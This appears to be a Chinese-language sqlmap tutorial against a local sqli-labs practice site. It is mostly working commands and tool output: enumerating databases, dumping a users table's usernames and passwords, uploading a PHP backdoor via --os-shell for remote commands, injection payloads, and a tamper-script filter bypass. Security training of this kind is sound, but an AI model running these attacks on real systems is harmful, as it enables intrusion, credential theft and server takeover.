其他注入工具
明小子
穿山甲
啊D
确定注入点后测试
sqlmap.py -u http://localhost/sqli/Less-1/?id=1
root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1
当前数据库
sqlmap.py -u http://localhost/sqli/Less-1/?id=1 --current-db
root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 --current-db
其他数据库
--dbs
root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -dbs
数据库内表
-D security --tables
root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security --tables
表内字段
-D security -T users --columns
root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security -T users --columns
-D security -T users -C username,password --dump
root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security -T users -C username,password --dump
注入木马
root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-7/?id=1 --os-shell
C:/phpstudy_pro/WWW
sqlmap.py -u http://localhost/sqli/Less-7/?id=1 --os-shell
root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 --os-shell
___
__H__
___ ___["]_____ ___ ___ {1.4.7#stable}
|_ -| . [,] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:51:21 /2020-12-28/
[22:51:21] [INFO] resuming back-end DBMS 'mysql'
[22:51:21] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4954=4954 AND 'HBhg'='HBhg
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a717a71,(SELECT (ELT(1554=1554,1))),0x716b6b6a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'HyHQ'='HyHQ
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 5466 FROM (SELECT(SLEEP(5)))fXNK) AND 'oDCa'='oDCa
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-8233' UNION ALL SELECT NULL,CONCAT(0x716a717a71,0x4666737259654f717656494b4e664d47434c55644a4e764d766d6a6c5a6f74726e71584f6c686358,0x716b6b6a71),NULL-- -
---
[22:51:22] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.5
[22:51:22] [INFO] going to use a web backdoor for command prompt
[22:51:22] [INFO] fingerprinting the back-end DBMS operating system
[22:51:23] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n]
[22:51:28] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: C:phpstudy_proWWW
[22:51:40] [WARNING] unable to automatically parse any web server path
[22:51:40] [INFO] trying to upload the file stager on 'C:/phpstudy_pro/WWW/' via LIMIT 'LINES TERMINATED BY' method
[22:51:41] [INFO] the file stager has been successfully uploaded on 'C:/phpstudy_pro/WWW/' - http://192.168.2.12:80/tmpucxne.php
[22:51:41] [INFO] the backdoor has been successfully uploaded on 'C:/phpstudy_pro/WWW/' - http://192.168.2.12:80/tmpbuonw.php
[22:51:41] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
os-shell> ipconfig
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
Windows IP 配置
以太网适配器 本地连接:
连接特定的 DNS 后缀 . . . . . . . : localdomain
本地链接 IPv6 地址. . . . . . . . : fe80::e488:cc63:a814:b8ab
IPv4 地址 . . . . . . . . . . . . : 192.168.2.12
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 192.168.2.2
隧道适配器 isatap.localdomain:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . : localdomain
---
宽字节注入
使用unmagicquotes方法进行宽字节绕过
sqlmap.py -u http://127.0.0.1/Less-32/?id=1 --tamper "unmagicquotes" --dbs
其他绕过脚本都存放在sqlmap的/tamper/目录下
例如kali:/usr/share/sqlmap/tamper/
脚本具体用途自行百度
https://www.cnblogs.com/mark0/p/12349551.html
抓取POST包,标记注入
1.burp抓取POST包导出
2.mysql -r [文件路径/文件名]
3.后续参数一样